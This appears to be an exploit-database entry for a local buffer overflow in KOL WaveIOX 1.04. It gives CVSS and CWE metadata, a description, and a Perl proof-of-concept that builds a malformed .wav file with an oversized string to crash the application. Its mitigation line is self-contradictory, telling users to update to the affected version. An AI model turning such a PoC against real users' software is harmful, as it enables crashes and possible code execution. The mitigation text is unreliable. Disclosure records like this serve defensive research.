header-logo
Suggest Exploit
vendor:
WaveIOX
by:
cr4wl3r
9,3
CVSS
HIGH
Buffer Overflow
120 (Buffer Copy without Checking Size of Input)
CWE
Product Name: WaveIOX
Affected Version From: 1.04
Affected Version To: 1.04
Patch Exists: Yes
Related CWE: N/A
CPE: a:kol:waveiox:1.04
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2020

KOL WaveIOX 1.04 (.wav) Local Buffer Overflow PoC

KOL WaveIOX 1.04 is vulnerable to a local buffer overflow vulnerability. An attacker can exploit this vulnerability by creating a malicious .wav file with a long string of characters and loading it into the application. This will cause the application to crash and potentially execute arbitrary code.

Mitigation:

Users should update to the latest version of KOL WaveIOX 1.04 and ensure that all security patches are applied.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#########################################################
## Usage-->>file created-->>load file-->>b00m.wav >>>BOOM
#########################################################


print "#####################################################\n";
print "[!] KOL WaveIOX 1.04 (.wav) Local Buffer Overflow PoC\n";
print "\n";
print "[!] Author: cr4wl3r\n";
print "[!] Mail: cr4wl3r[!]linuxmail.org\n";
print "#####################################################\n";


my $boom = "http://"."\x41" x 1337;
my $filename = "b00m.wav";
open (FILE,">$filename");
print FILE "$boom";
print "\nFile successfully created!\n";

Navigation

Suggest Exploit

Services By CQR